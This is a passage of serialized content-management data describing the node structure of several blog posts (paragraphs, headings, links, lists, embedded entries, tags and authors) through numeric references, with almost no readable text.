type":2246},{"data":68207,"marks":68208,"value":66512,"nodeType":864},{},[],{"data":68210,"content":68211,"nodeType":1312},{},[68212],{"data":68213,"marks":68214,"value":66519,"nodeType":864},{},[],{"data":68216,"content":68217,"nodeType":860},{},[68218,68221,68228,68231,68238,68241,68248,68251,68258,68261,68268],{"data":68219,"marks":68220,"value":66526,"nodeType":864},{},[],{"data":68222,"content":68223,"nodeType":883},{"uri":66529},[68224],{"data":68225,"marks":68226,"value":66535,"nodeType":864},{},[68227],{"type":1455},{"data":68229,"marks":68230,"value":902,"nodeType":864},{},[],{"data":68232,"content":68233,"nodeType":883},{"uri":66541},[68234],{"data":68235,"marks":68236,"value":66547,"nodeType":864},{},[68237],{"type":1455},{"data":68239,"marks":68240,"value":66551,"nodeType":864},{},[],{"data":68242,"content":68243,"nodeType":883},{"uri":66554},[68244],{"data":68245,"marks":68246,"value":66560,"nodeType":864},{},[68247],{"type":1455},{"data":68249,"marks":68250,"value":66564,"nodeType":864},{},[],{"data":68252,"content":68253,"nodeType":883},{"uri":19589},[68254],{"data":68255,"marks":68256,"value":66572,"nodeType":864},{},[68257],{"type":1455},{"data":68259,"marks":68260,"value":66576,"nodeType":864},{},[],{"data":68262,"content":68263,"nodeType":883},{"uri":66579},[68264],{"data":68265,"marks":68266,"value":66585,"nodeType":864},{},[68267],{"type":1455},{"data":68269,"marks":68270,"value":66589,"nodeType":864},{},[],{"data":68272,"content":68273,"nodeType":860},{},[68274],{"data":68275,"marks":68276,"value":66596,"nodeType":864},{},[],{"data":68278,"content":68279,"nodeType":1312},{},[68280],{"data":68281,"marks":68282,"value":66603,"nodeType":864},{},[],{"data":68284,"content":68285,"nodeType":860},{},[68286,68289,68293,68296,68303],{"data":68287,"marks":68288,"value":66610,"nodeType":864},{},[],{"data":68290,"marks":68291,"value":66615,"nodeType":864},{},[68292],{"type":1455},{"data":68294,"marks":68295,"value":66619,"nodeType":864},{},[],{"data":68297,"content":68298,"nodeType":883},{"uri":66622},[68299],{"data":68300,"marks":68301,"value":66628,"nodeType":864},{},[68302],{"type":1455},{"data":68304,"marks":68305,"value":66632,"nodeType":864},{},[],{"data":68307,"content":68308,"nodeType":860},{},[68309,68312,68316],{"data":68310,"marks":68311,"value":66639,"nodeType":864},{},[],{"data":68313,"marks":68314,"value":66644,"nodeType":864},{},[68315],{"type":2246},{"data":68317,"marks":68318,"value":2924,"nodeType":864},{},[],{"data":68320,"content":68321,"nodeType":860},{},[68322],{"data":68323,"marks":68324,"value":66654,"nodeType":864},{},[],{"data":68326,"content":68327,"nodeType":1312},{},[68328],{"data":68329,"marks":68330,"value":66661,"nodeType":864},{},[],{"data":68332,"content":68333,"nodeType":860},{},[68334],{"data":68335,"marks":68336,"value":66668,"nodeType":864},{},[],{"data":68338,"content":68339,"nodeType":860},{},[68340,68343,68350,68353,68360],{"data":68341,"marks":68342,"value":66675,"nodeType":864},{},[],{"data":68344,"content":68345,"nodeType":883},{"uri":66678},[68346],{"data":68347,"marks":68348,"value":66684,"nodeType":864},{},[68349],{"type":1455},{"data":68351,"marks":68352,"value":66688,"nodeType":864},{},[],{"data":68354,"content":68355,"nodeType":883},{"uri":66691},[68356],{"data":68357,"marks":68358,"value":66697,"nodeType":864},{},[68359],{"type":1455},{"data":68361,"marks":68362,"value":66701,"nodeType":864},{},[],{"data":68364,"content":68365,"nodeType":860},{},[68366,68369,68377],{"data":68367,"marks":68368,"value":66708,"nodeType":864},{},[],{"data":68370,"content":68371,"nodeType":883},{"uri":66711},[68372],{"data":68373,"marks":68374,"value":66718,"nodeType":864},{},[68375,68376],{"type":1455},{"type":2246},{"data":68378,"marks":68379,"value":21,"nodeType":864},{},[],{"data":68381,"content":68382,"nodeType":860},{},[68383],{"data":68384,"marks":68385,"value":66728,"nodeType":864},{},[],{"data":68387,"content":68388,"nodeType":1009},{},[68389],{"data":68390,"marks":68391,"value":66735,"nodeType":864},{},[],{"data":68393,"content":68394,"nodeType":860},{},[68395],{"data":68396,"marks":68397,"value":66742,"nodeType":864},{},[],{"data":68399,"content":68400,"nodeType":860},{},[68401],{"data":68402,"marks":68403,"value":66749,"nodeType":864},{},[],{"data":68405,"content":68406,"nodeType":860},{},[68407,68410,68417],{"data":68408,"marks":68409,"value":66756,"nodeType":864},{},[],{"data":68411,"content":68412,"nodeType":883},{"uri":66759},[68413],{"data":68414,"marks":68415,"value":66765,"nodeType":864},{},[68416],{"type":1455},{"data":68418,"marks":68419,"value":2924,"nodeType":864},{},[],{"data":68421,"content":68422,"nodeType":860},{},[68423,68426,68433],{"data":68424,"marks":68425,"value":66775,"nodeType":864},{},[],{"data":68427,"content":68428,"nodeType":883},{"uri":6418},[68429],{"data":68430,"marks":68431,"value":6423,"nodeType":864},{},[68432],{"type":1455},{"data":68434,"marks":68435,"value":66786,"nodeType":864},{},[],{"data":68437,"content":68440,"nodeType":996},{"target":68438},{"sys":68439},{"id":58370,"type":1001,"linkType":1002},[],{"data":68442,"content":68443,"nodeType":860},{},[68444],{"data":68445,"marks":68446,"value":21,"nodeType":864},{},[],{"items":68448},[68449,68451],{"sys":68450,"name":6593},{"id":6592},{"sys":68452,"name":342},{"id":6596},{"items":68454},[68455],{"fullName":10772,"firstName":10773,"jobTitle":10774,"profilePicture":68456},{"url":10776},{"__typename":2059,"sys":68458,"content":68459,"title":61741,"synopsis":60873,"hashTags":59,"publishedDate":61742,"slug":61743,"tagsCollection":69218,"authorsCollection":69224},{"id":60862},{"json":68460},{"data":68461,"content":68462,"nodeType":856},{},[68463,68469,68475,68503,68509,68515,68531,68537,68543,68549,68573,68579,68585,68598,68604,68610,68640,68646,68652,68658,68664,68670,68675,68681,68687,68693,68700,68706,68722,68728,68734,68740,68746,68752,68758,68764,68770,68776,68781,68787,68803,68809,68825,68830,68835,68840,68846,68852,68858,68863,68868,68874,68880,68886,68892,68898,68903,68919,68935,68941,68946,68951,68957,68963,68969,68975,68996,69001,69006,69012,69018,69024,69034,69039,69045,69050,69055,69061,69067,69073,69078,69083,69089,69095,69200,69206,69212],{"data":68464,"content":68465,"nodeType":860},{},[68466],{"data":68467,"marks":68468,"value":60873,"nodeType":864},{},[],{"data":68470,"content":68471,"nodeType":860},{},[68472],{"data":68473,"marks":68474,"value":60880,"nodeType":864},{},[],{"data":68476,"content":68477,"nodeType":860},{},[68478,68481,68488,68491,68500],{"data":68479,"marks":68480,"value":60887,"nodeType":864},{},[],{"data":68482,"content":68483,"nodeType":883},{"uri":6418},[68484],{"data":68485,"marks":68486,"value":5765,"nodeType":864},{},[68487],{"type":1455},{"data":68489,"marks":68490,"value":60898,"nodeType":864},{},[],{"data":68492,"content":68495,"nodeType":57700},{"target":68493},{"sys":68494},{"id":58881,"type":1001,"linkType":1002},[68496],{"data":68497,"marks":68498,"value":5236,"nodeType":864},{},[68499],{"type":1455},{"data":68501,"marks":68502,"value":10094,"nodeType":864},{},[],{"data":68504,"content":68505,"nodeType":860},{},[68506],{"data":68507,"marks":68508,"value":60917,"nodeType":864},{},[],{"data":68510,"content":68511,"nodeType":1009},{},[68512],{"data":68513,"marks":68514,"value":60924,"nodeType":864},{},[],{"data":68516,"content":68517,"nodeType":860},{},[68518,68521,68528],{"data":68519,"marks":68520,"value":60931,"nodeType":864},{},[],{"data":68522,"content":68523,"nodeType":883},{"uri":59957},[68524],{"data":68525,"marks":68526,"value":60939,"nodeType":864},{},[68527],{"type":1455},{"data":68529,"marks":68530,"value":60943,"nodeType":864},{},[],{"data":68532,"content":68533,"nodeType":860},{},[68534],{"data":68535,"marks":68536,"value":60950,"nodeType":864},{},[],{"data":68538,"content":68539,"nodeType":1009},{},[68540],{"data":68541,"marks":68542,"value":60957,"nodeType":864},{},[],{"data":68544,"content":68545,"nodeType":860},{},[68546],{"data":68547,"marks":68548,"value":60964,"nodeType":864},{},[],{"data":68550,"content":68551,"nodeType":860},{},[68552,68555,68562,68565,68570],{"data":68553,"marks":68554,"value":60971,"nodeType":864},{},[],{"data":68556,"content":68557,"nodeType":883},{"uri":39722},[68558],{"data":68559,"marks":68560,"value":60979,"nodeType":864},{},[68561],{"type":1455},{"data":68563,"marks":68564,"value":60983,"nodeType":864},{},[],{"data":68566,"marks":68567,"value":60989,"nodeType":864},{},[68568,68569],{"type":2246},{"type":899},{"data":68571,"marks":68572,"value":60993,"nodeType":864},{},[],{"data":68574,"content":68575,"nodeType":1009},{},[68576],{"data":68577,"marks":68578,"value":60484,"nodeType":864},{},[],{"data":68580,"content":68581,"nodeType":860},{},[68582],{"data":68583,"marks":68584,"value":61006,"nodeType":864},{},[],{"data":68586,"content":68587,"nodeType":860},{},[68588,68591,68595],{"data":68589,"marks":68590,"value":61013,"nodeType":864},{},[],{"data":68592,"marks":68593,"value":61018,"nodeType":864},{},[68594],{"type":1455},{"data":68596,"marks":68597,"value":61022,"nodeType":864},{},[],{"data":68599,"content":68600,"nodeType":860},{},[68601],{"data":68602,"marks":68603,"value":61029,"nodeType":864},{},[],{"data":68605,"content":68606,"nodeType":860},{},[68607],{"data":68608,"marks":68609,"value":61036,"nodeType":864},{},[],{"data":68611,"content":68612,"nodeType":61070},{},[68613,68622,68631],{"data":68614,"content":68615,"nodeType":945},{},[68616],{"data":68617,"content":68618,"nodeType":860},{},[68619],{"data":68620,"marks":68621,"value":61049,"nodeType":864},{},[],{"data":68623,"content":68624,"nodeType":945},{},[68625],{"data":68626,"content":68627,"nodeType":860},{},[68628],{"data":68629,"marks":68630,"value":61059,"nodeType":864},{},[],{"data":68632,"content":68633,"nodeType":945},{},[68634],{"data":68635,"content":68636,"nodeType":860},{},[68637],{"data":68638,"marks":68639,"value":61069,"nodeType":864},{},[],{"data":68641,"content":68642,"nodeType":1312},{},[68643],{"data":68644,"marks":68645,"value":61077,"nodeType":864},{},[],{"data":68647,"content":68648,"nodeType":860},{},[68649],{"data":68650,"marks":68651,"value":61084,"nodeType":864},{},[],{"data":68653,"content":68654,"nodeType":860},{},[68655],{"data":68656,"marks":68657,"value":61091,"nodeType":864},{},[],{"data":68659,"content":68660,"nodeType":860},{},[68661],{"data":68662,"marks":68663,"value":61098,"nodeType":864},{},[],{"data":68665,"content":68666,"nodeType":860},{},[68667],{"data":68668,"marks":68669,"value":61105,"nodeType":864},{},[],{"data":68671,"content":68674,"nodeType":996},{"target":68672},{"sys":68673},{"id":61110,"type":1001,"linkType":1002},[],{"data":68676,"content":68677,"nodeType":1312},{},[68678],{"data":68679,"marks":68680,"value":61118,"nodeType":864},{},[],{"data":68682,"content":68683,"nodeType":860},{},[68684],{"data":68685,"marks":68686,"value":61125,"nodeType":864},{},[],{"data":68688,"content":68689,"nodeType":860},{},[68690],{"data":68691,"marks":68692,"value":61132,"nodeType":864},{},[],{"data":68694,"content":68695,"nodeType":860},{},[68696],{"data":68697,"marks":68698,"value":61140,"nodeType":864},{},[68699],{"type":899},{"data":68701,"content":68702,"nodeType":1312},{},[68703],{"data":68704,"marks":68705,"value":61147,"nodeType":864},{},[],{"data":68707,"content":68708,"nodeType":860},{},[68709,68712,68719],{"data":68710,"marks":68711,"value":61154,"nodeType":864},{},[],{"data":68713,"content":68714,"nodeType":883},{"uri":61157},[68715],{"data":68716,"marks":68717,"value":61163,"nodeType":864},{},[68718],{"type":1455},{"data":68720,"marks":68721,"value":61167,"nodeType":864},{},[],{"data":68723,"content":68724,"nodeType":860},{},[68725],{"data":68726,"marks":68727,"value":61174,"nodeType":864},{},[],{"data":68729,"content":68730,"nodeType":860},{},[68731],{"data":68732,"marks":68733,"value":61181,"nodeType":864},{},[],{"data":68735,"content":68736,"nodeType":1009},{},[68737],{"data":68738,"marks":68739,"value":61188,"nodeType":864},{},[],{"data":68741,"content":68742,"nodeType":860},{},[68743],{"data":68744,"marks":68745,"value":61195,"nodeType":864},{},[],{"data":68747,"content":68748,"nodeType":860},{},[68749],{"data":68750,"marks":68751,"value":61202,"nodeType":864},{},[],{"data":68753,"content":68754,"nodeType":860},{},[68755],{"data":68756,"marks":68757,"value":61209,"nodeType":864},{},[],{"data":68759,"content":68760,"nodeType":860},{},[68761],{"data":68762,"marks":68763,"value":61216,"nodeType":864},{},[],{"data":68765,"content":68766,"nodeType":860},{},[68767],{"data":68768,"marks":68769,"value":61223,"nodeType":864},{},[],{"data":68771,"content":68772,"nodeType":860},{},[68773],{"data":68774,"marks":68775,"value":61230,"nodeType":864},{},[],{"data":68777,"content":68780,"nodeType":996},{"target":68778},{"sys":68779},{"id":61235,"type":1001,"linkType":1002},[],{"data":68782,"content":68783,"nodeType":1009},{},[68784],{"data":68785,"marks":68786,"value":61243,"nodeType":864},{},[],{"data":68788,"content":68789,"nodeType":860},{},[68790,68793,68800],{"data":68791,"marks":68792,"value":61250,"nodeType":864},{},[],{"data":68794,"content":68795,"nodeType":883},{"uri":61253},[68796],{"data":68797,"marks":68798,"value":61259,"nodeType":864},{},[68799],{"type":1455},{"data":68801,"marks":68802,"value":61263,"nodeType":864},{},[],{"data":68804,"content":68805,"nodeType":1312},{},[68806],{"data":68807,"marks":68808,"value":61270,"nodeType":864},{},[],{"data":68810,"content":68811,"nodeType":860},{},[68812,68815,68822],{"data":68813,"marks":68814,"value":61277,"nodeType":864},{},[],{"data":68816,"content":68817,"nodeType":883},{"uri":61280},[68818],{"data":68819,"marks":68820,"value":61280,"nodeType":864},{},[68821],{"type":1455},{"data":68823,"marks":68824,"value":61289,"nodeType":864},{},[],{"data":68826,"content":68829,"nodeType":996},{"target":68827},{"sys":68828},{"id":61294,"type":1001,"linkType":1002},[],{"data":68831,"content":68834,"nodeType":996},{"target":68832},{"sys":68833},{"id":61300,"type":1001,"linkType":1002},[],{"data":68836,"content":68839,"nodeType":996},{"target":68837},{"sys":68838},{"id":61306,"type":1001,"linkType":1002},[],{"data":68841,"content":68842,"nodeType":1312},{},[68843],{"data":68844,"marks":68845,"value":61314,"nodeType":864},{},[],{"data":68847,"content":68848,"nodeType":860},{},[68849],{"data":68850,"marks":68851,"value":61321,"nodeType":864},{},[],{"data":68853,"content":68854,"nodeType":860},{},[68855],{"data":68856,"marks":68857,"value":61328,"nodeType":864},{},[],{"data":68859,"content":68862,"nodeType":996},{"target":68860},{"sys":68861},{"id":61333,"type":1001,"linkType":1002},[],{"data":68864,"content":68867,"nodeType":996},{"target":68865},{"sys":68866},{"id":61339,"type":1001,"linkType":1002},[],{"data":68869,"content":68870,"nodeType":1009},{},[68871],{"data":68872,"marks":68873,"value":61347,"nodeType":864},{},[],{"data":68875,"content":68876,"nodeType":860},{},[68877],{"data":68878,"marks":68879,"value":61354,"nodeType":864},{},[],{"data":68881,"content":68882,"nodeType":860},{},[68883],{"data":68884,"marks":68885,"value":61361,"nodeType":864},{},[],{"data":68887,"content":68888,"nodeType":1312},{},[68889],{"data":68890,"marks":68891,"value":61368,"nodeType":864},{},[],{"data":68893,"content":68894,"nodeType":860},{},[68895],{"data":68896,"marks":68897,"value":61375,"nodeType":864},{},[],{"data":68899,"content":68902,"nodeType":996},{"target":68900},{"sys":68901},{"id":61380,"type":1001,"linkType":1002},[],{"data":68904,"content":68905,"nodeType":860},{},[68906,68909,68916],{"data":68907,"marks":68908,"value":61388,"nodeType":864},{},[],{"data":68910,"content":68911,"nodeType":883},{"uri":60804},[68912],{"data":68913,"marks":68914,"value":60810,"nodeType":864},{},[68915],{"type":1455},{"data":68917,"marks":68918,"value":61399,"nodeType":864},{},[],{"data":68920,"content":68921,"nodeType":860},{},[68922,68925,68932],{"data":68923,"marks":68924,"value":61406,"nodeType":864},{},[],{"data":68926,"content":68927,"nodeType":883},{"uri":61409},[68928],{"data":68929,"marks":68930,"value":61415,"nodeType":864},{},[68931],{"type":1455},{"data":68933,"marks":68934,"value":61419,"nodeType":864},{},[],{"data":68936,"content":68937,"nodeType":860},{},[68938],{"data":68939,"marks":68940,"value":61426,"nodeType":864},{},[],{"data":68942,"content":68945,"nodeType":996},{"target":68943},{"sys":68944},{"id":61431,"type":1001,"linkType":1002},[],{"data":68947,"content":68950,"nodeType":996},{"target":68948},{"sys":68949},{"id":61437,"type":1001,"linkType":1002},[],{"data":68952,"content":68953,"nodeType":860},{},[68954],{"data":68955,"marks":68956,"value":61445,"nodeType":864},{},[],{"data":68958,"content":68959,"nodeType":1312},{},[68960],{"data":68961,"marks":68962,"value":61452,"nodeType":864},{},[],{"data":68964,"content":68965,"nodeType":860},{},[68966],{"data":68967,"marks":68968,"value":61459,"nodeType":864},{},[],{"data":68970,"content":68971,"nodeType":860},{},[68972],{"data":68973,"marks":68974,"value":61466,"nodeType":864},{},[],{"data":68976,"content":68977,"nodeType":941},{},[68978,68987],{"data":68979,"content":68980,"nodeType":945},{},[68981],{"data":68982,"content":68983,"nodeType":860},{},[68984],{"data":68985,"marks":68986,"value":61479,"nodeType":864},{},[],{"data":68988,"content":68989,"nodeType":945},{},[68990],{"data":68991,"content":68992,"nodeType":860},{},[68993],{"data":68994,"marks":68995,"value":61489,"nodeType":864},{},[],{"data":68997,"content":69000,"nodeType":996},{"target":68998},{"sys":68999},{"id":61494,"type":1001,"linkType":1002},[],{"data":69002,"content":69005,"nodeType":996},{"target":69003},{"sys":69004},{"id":61500,"type":1001,"linkType":1002},[],{"data":69007,"content":69008,"nodeType":860},{},[69009],{"data":69010,"marks":69011,"value":61508,"nodeType":864},{},[],{"data":69013,"content":69014,"nodeType":860},{},[69015],{"data":69016,"marks":69017,"value":61515,"nodeType":864},{},[],{"data":69019,"content":69020,"nodeType":860},{},[69021],{"data":69022,"marks":69023,"value":61522,"nodeType":864},{},[],{"data":69025,"content":69026,"nodeType":860},{},[69027,69030],{"data":69028,"marks":69029,"value":61529,"nodeType":864},{},[],{"data":69031,"marks":69032,"value":14717,"nodeType":864},{},[69033],{"type":2246},{"data":69035,"content":69038,"nodeType":996},{"target":69036},{"sys":69037},{"id":61538,"type":1001,"linkType":1002},[],{"data":69040,"content":69041,"nodeType":860},{},[69042],{"data":69043,"marks":69044,"value":61546,"nodeType":864},{},[],{"data":69046,"content":69049,"nodeType":996},{"target":69047},{"sys":69048},{"id":61551,"type":1001,"linkType":1002},[],{"data":69051,"content":69054,"nodeType":996},{"target":69052},{"sys":69053},{"id":61557,"type":1001,"linkType":1002},[],{"data":69056,"content":69057,"nodeType":860},{},[69058],{"data":69059,"marks":69060,"value":61565,"nodeType":864},{},[],{"data":69062,"content":69063,"nodeType":1009},{},[69064],{"data":69065,"marks":69066,"value":61572,"nodeType":864},{},[],{"data":69068,"content":69069,"nodeType":860},{},[69070],{"data":69071,"marks":69072,"value":61579,"nodeType":864},{},[],{"data":69074,"content":69077,"nodeType":996},{"target":69075},{"sys":69076},{"id":61584,"type":1001,"linkType":1002},[],{"data":69079,"content":69082,"nodeType":996},{"target":69080},{"sys":69081},{"id":61590,"type":1001,"linkType":1002},[],{"data":69084,"content":69085,"nodeType":1009},{},[69086],{"data":69087,"marks":69088,"value":58288,"nodeType":864},{},[],{"data":69090,"content":69091,"nodeType":860},{},[69092],{"data":69093,"marks":69094,"value":61604,"nodeType":864},{},[],{"data":69096,"content":69097,"nodeType":941},{},[69098,69107,69116,69125,69134,69182,69191],{"data":69099,"content":69100,"nodeType":945},{},[69101],{"data":69102,"content":69103,"nodeType":860},{},[69104],{"data":69105,"marks":69106,"value":61617,"nodeType":864},{},[],{"data":69108,"content":69109,"nodeType":945},{},[69110],{"data":69111,"content":69112,"nodeType":860},{},[69113],{"data":69114,"marks":69115,"value":61627,"nodeType":864},{},[],{"data":69117,"content":69118,"nodeType":945},{},[69119],{"data":69120,"content":69121,"nodeType":860},{},[69122],{"data":69123,"marks":69124,"value":61637,"nodeType":864},{},[],{"data":69126,"content":69127,"nodeType":945},{},[69128],{"data":69129,"content":69130,"nodeType":860},{},[69131],{"data":69132,"marks":69133,"value":61647,"nodeType":864},{},[],{"data":69135,"content":69136,"nodeType":945},{},[69137,69143],{"data":69138,"content":69139,"nodeType":860},{},[69140],{"data":69141,"marks":69142,"value":61657,"nodeType":864},{},[],{"data":69144,"content":69145,"nodeType":941},{},[69146,69155,69164,69173],{"data":69147,"content":69148,"nodeType":945},{},[69149],{"data":69150,"content":69151,"nodeType":860},{},[69152],{"data":69153,"marks":69154,"value":61670,"nodeType":864},{},[],{"data":69156,"content":69157,"nodeType":945},{},[69158],{"data":69159,"content":69160,"nodeType":860},{},[69161],{"data":69162,"marks":69163,"value":61680,"nodeType":864},{},[],{"data":69165,"content":69166,"nodeType":945},{},[69167],{"data":69168,"content":69169,"nodeType":860},{},[69170],{"data":69171,"marks":69172,"value":61690,"nodeType":864},{},[],{"data":69174,"content":69175,"nodeType":945},{},[69176],{"data":69177,"content":69178,"nodeType":860},{},[69179],{"data":69180,"marks":69181,"value":61700,"nodeType":864},{},[],{"data":69183,"content":69184,"nodeType":945},{},[69185],{"data":69186,"content":69187,"nodeType":860},{},[69188],{"data":69189,"marks":69190,"value":61710,"nodeType":864},{},[],{"data":69192,"content":69193,"nodeType":945},{},[69194],{"data":69195,"content":69196,"nodeType":860},{},[69197],{"data":69198,"marks":69199,"value":61720,"nodeType":864},{},[],{"data":69201,"content":69202,"nodeType":1009},{},[69203],{"data":69204,"marks":69205,"value":24968,"nodeType":864},{},[],{"data":69207,"content":69208,"nodeType":860},{},[69209],{"data":69210,"marks":69211,"value":61733,"nodeType":864},{},[],{"data":69213,"content":69214,"nodeType":860},{},[69215],{"data":69216,"marks":69217,"value":61740,"nodeType":864},{},[],{"items":69219},[69220,69222],{"sys":69221,"name":6593},{"id":6592},{"sys":69223,"name":342},{"id":6596},{"items":69225},[69226],{"fullName":4949,"firstName":4950,"jobTitle":4951,"profilePicture":69227},{"url":4955},{"__typename":2059,"sys":69229,"content":69230,"title":62629,"synopsis":67248,"hashTags":59,"publishedDate":67249,"slug":62630,"tagsCollection":69602,"authorsCollection":69606},{"id":62145},{"json":69231},{"data":69232,"content":69233,"nodeType":856},{},[69234,69240,69246,69252,69258,69264,69269,69275,69281,69287,69293,69298,69304,69309,69326,69332,69337,69354,69371,69386,69392,69398,69404,69410,69415,69420,69426,69432,69438,69444,69449,69455,69497,69502,69507,69523,69528,69534,69539,69545,69550,69556,69562,69567,69572,69578,69584,69590,69596],{"data":69235,"content":69236,"nodeType":860},{},[69237],{"data":69238,"marks":69239,"value":66824,"nodeType":864},{},[],{"data":69241,"content":69242,"nodeType":860},{},[69243],{"data":69244,"marks":69245,"value":66831,"nodeType":864},{},[],{"data":69247,"content":69248,"nodeType":1009},{},[69249],{"data":69250,"marks":69251,"value":66838,"nodeType":864},{},[],{"data":69253,"content":69254,"nodeType":860},{},[69255],{"data":69256,"marks":69257,"value":66845,"nodeType":864},{},[],{"data":69259,"content":69260,"nodeType":860},{},[69261],{"data":69262,"marks":69263,"value":66852,"nodeType":864},{},[],{"data":69265,"content":69268,"nodeType":996},{"target":69266},{"sys":69267},{"id":66857,"type":1001,"linkType":1002},[],{"data":69270,"content":69271,"nodeType":860},{},[69272],{"data":69273,"marks":69274,"value":66865,"nodeType":864},{},[],{"data":69276,"content":69277,"nodeType":860},{},[69278],{"data":69279,"marks":69280,"value":66872,"nodeType":864},{},[],{"data":69282,"content":69283,"nodeType":860},{},[69284],{"data":69285,"marks":69286,"value":66879,"nodeType":864},{},[],{"data":69288,"content":69289,"nodeType":1312},{},[69290],{"data":69291,"marks":69292,"value":66886,"nodeType":864},{},[],{"data":69294,"content":69297,"nodeType":996},{"target":69295},{"sys":69296},{"id":66891,"type":1001,"linkType":1002},[],{"data":69299,"content":69300,"nodeType":860},{},[69301],{"data":69302,"marks":69303,"value":66899,"nodeType":864},{},[],{"data":69305,"content":69308,"nodeType":996},{"target":69306},{"sys":69307},{"id":66904,"type":1001,"linkType":1002},[],{"data":69310,"content":69311,"nodeType":860},{},[69312,69315,69323],{"data":69313,"marks":69314,"value":66912,"nodeType":864},{},[],{"data":69316,"content":69319,"nodeType":57700},{"target":69317},{"sys":69318},{"id":66917,"type":1001,"linkType":1002},[69320],{"data":69321,"marks":69322,"value":66922,"nodeType":864},{},[],{"data":69324,"marks":69325,"value":2924,"nodeType":864},{},[],{"data":69327,"content":69328,"nodeType":1312},{},[69329],{"data":69330,"marks":69331,"value":66932,"nodeType":864},{},[],{"data":69333,"content":69336,"nodeType":996},{"target":69334},{"sys":69335},{"id":66937,"type":1001,"linkType":1002},[],{"data":69338,"content":69339,"nodeType":860},{},[69340,69343,69351],{"data":69341,"marks":69342,"value":66945,"nodeType":864},{},[],{"data":69344,"content":69347,"nodeType":57700},{"target":69345},{"sys":69346},{"id":66950,"type":1001,"linkType":1002},[69348],{"data":69349,"marks":69350,"value":66922,"nodeType":864},{},[],{"data":69352,"marks":69353,"value":10094,"nodeType":864},{},[],{"data":69355,"content":69356,"nodeType":860},{},[69357,69360,69368],{"data":69358,"marks":69359,"value":66964,"nodeType":864},{},[],{"data":69361,"content":69364,"nodeType":57700},{"target":69362},{"sys":69363},{"id":66969,"type":1001,"linkType":1002},[69365],{"data":69366,"marks":69367,"value":22602,"nodeType":864},{},[],{"data":69369,"marks":69370,"value":66977,"nodeType":864},{},[],{"data":69372,"content":69373,"nodeType":860},{},[69374,69377,69383],{"data":69375,"marks":69376,"value":66984,"nodeType":864},{},[],{"data":69378,"content":69379,"nodeType":883},{"uri":66987},[69380],{"data":69381,"marks":69382,"value":66992,"nodeType":864},{},[],{"data":69384,"marks":69385,"value":66996,"nodeType":864},{},[],{"data":69387,"content":69388,"nodeType":1312},{},[69389],{"data":69390,"marks":69391,"value":67003,"nodeType":864},{},[],{"data":69393,"content":69394,"nodeType":860},{},[69395],{"data":69396,"marks":69397,"value":67010,"nodeType":864},{},[],{"data":69399,"content":69400,"nodeType":860},{},[69401],{"data":69402,"marks":69403,"value":67017,"nodeType":864},{},[],{"data":69405,"content":69406,"nodeType":860},{},[69407],{"data":69408,"marks":69409,"value":67024,"nodeType":864},{},[],{"data":69411,"content":69414,"nodeType":996},{"target":69412},{"sys":69413},{"id":67029,"type":1001,"linkType":1002},[],{"data":69416,"content":69419,"nodeType":996},{"target":69417},{"sys":69418},{"id":67035,"type":1001,"linkType":1002},[],{"data":69421,"content":69422,"nodeType":1312},{},[69423],{"data":69424,"marks":69425,"value":67043,"nodeType":864},{},[],{"data":69427,"content":69428,"nodeType":860},{},[69429],{"data":69430,"marks":69431,"value":67050,"nodeType":864},{},[],{"data":69433,"content":69434,"nodeType":860},{},[69435],{"data":69436,"marks":69437,"value":67057,"nodeType":864},{},[],{"data":69439,"content":69440,"nodeType":860},{},[69441],{"data":69442,"marks":69443,"value":67064,"nodeType":864},{},[],{"data":69445,"content":69448,"nodeType":996},{"target":69446},{"sys":69447},{"id":67069,"type":1001,"linkType":1002},[],{"data":69450,"content":69451,"nodeType":860},{},[69452],{"data":69453,"marks":69454,"value":67077,"nodeType":864},{},[],{"data":69456,"content":69457,"nodeType":941},{},[69458,69471,69484],{"data":69459,"content":69460,"nodeType":945},{},[69461],{"data":69462,"content":69463,"nodeType":860},{},[69464,69468],{"data":69465,"marks":69466,"value":67091,"nodeType":864},{},[69467],{"type":899},{"data":69469,"marks":69470,"value":67095,"nodeType":864},{},[],{"data":69472,"content":69473,"nodeType":945},{},[69474],{"data":69475,"content":69476,"nodeType":860},{},[69477,69481],{"data":69478,"marks":69479,"value":67106,"nodeType":864},{},[69480],{"type":899},{"data":69482,"marks":69483,"value":67110,"nodeType":864},{},[],{"data":69485,"content":69486,"nodeType":945},{},[69487],{"data":69488,"content":69489,"nodeType":860},{},[69490,69494],{"data":69491,"marks":69492,"value":67121,"nodeType":864},{},[69493],{"type":899},{"data":69495,"marks":69496,"value":67125,"nodeType":864},{},[],{"data":69498,"content":69501,"nodeType":996},{"target":69499},{"sys":69500},{"id":67130,"type":1001,"linkType":1002},[],{"data":69503,"content":69506,"nodeType":996},{"target":69504},{"sys":69505},{"id":67136,"type":1001,"linkType":1002},[],{"data":69508,"content":69509,"nodeType":941},{},[69510],{"data":69511,"content":69512,"nodeType":945},{},[69513],{"data":69514,"content":69515,"nodeType":860},{},[69516,69520],{"data":69517,"marks":69518,"value":67151,"nodeType":864},{},[69519],{"type":899},{"data":69521,"marks":69522,"value":67155,"nodeType":864},{},[],{"data":69524,"content":69527,"nodeType":996},{"target":69525},{"sys":69526},{"id":67160,"type":1001,"linkType":1002},[],{"data":69529,"content":69530,"nodeType":860},{},[69531],{"data":69532,"marks":69533,"value":67168,"nodeType":864},{},[],{"data":69535,"content":69538,"nodeType":996},{"target":69536},{"sys":69537},{"id":67173,"type":1001,"linkType":1002},[],{"data":69540,"content":69541,"nodeType":1312},{},[69542],{"data":69543,"marks":69544,"value":67181,"nodeType":864},{},[],{"data":69546,"content":69549,"nodeType":996},{"target":69547},{"sys":69548},{"id":67186,"type":1001,"linkType":1002},[],{"data":69551,"content":69552,"nodeType":860},{},[69553],{"data":69554,"marks":69555,"value":67194,"nodeType":864},{},[],{"data":69557,"content":69558,"nodeType":860},{},[69559],{"data":69560,"marks":69561,"value":67201,"nodeType":864},{},[],{"data":69563,"content":69566,"nodeType":996},{"target":69564},{"sys":69565},{"id":67206,"type":1001,"linkType":1002},[],{"data":69568,"content":69571,"nodeType":996},{"target":69569},{"sys":69570},{"id":67212,"type":1001,"linkType":1002},[],{"data":69573,"content":69574,"nodeType":1312},{},[69575],{"data":69576,"marks":69577,"value":24968,"nodeType":864},{},[],{"data":69579,"content":69580,"nodeType":860},{},[69581],{"data":69582,"marks":69583,"value":67226,"nodeType":864},{},[],{"data":69585,"content":69586,"nodeType":860},{},[69587],{"data":69588,"marks":69589,"value":67233,"nodeType":864},{},[],{"data":69591,"content":69592,"nodeType":860},{},[69593],{"data":69594,"marks":69595,"value":67240,"nodeType":864},{},[],{"data":69597,"content":69598,"nodeType":860}